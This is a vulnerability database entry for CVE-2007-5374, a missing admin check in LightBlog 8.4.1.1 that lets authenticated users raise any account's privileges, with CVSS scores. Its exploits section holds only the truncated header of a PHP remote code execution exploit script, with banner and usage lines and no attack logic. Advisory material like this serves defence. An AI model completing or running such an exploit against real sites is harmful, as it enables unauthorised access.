6.5
CVSSv2

CVE-2007-5374

Published: 11/10/2007 Updated: 29/09/2017
CVSS v2 Base Score: 6.5 | Impact Score: 6.4 | Exploitability Score: 8
VMScore: 655
Vector: AV:N/AC:L/Au:S/C:P/I:P/A:P

Vulnerability Summary

cp_memberedit.php in LightBlog 8.4.1.1 does not check for administrative credentials when processing an admin action, which allows remote authenticated users to increase the privileges of any account.

Vulnerable Product Search on Vulmon Subscribe to Product

lightblog lightblog 8.4.1.1

Exploits

#!/usr/bin/php -q -d short_open_tag=on <? echo " LightBlog 8411 Remote Code Execution Exploit by BlackHawk <hawkgotyou@gmailcom> <itablackhawkaltervistaorg> Thanks to rgod for the php code and Marty for the Love "; if ($argc<3) { echo "Usage: php "$argv[0]" Host Path Host: target server (ip/hostname) Path ...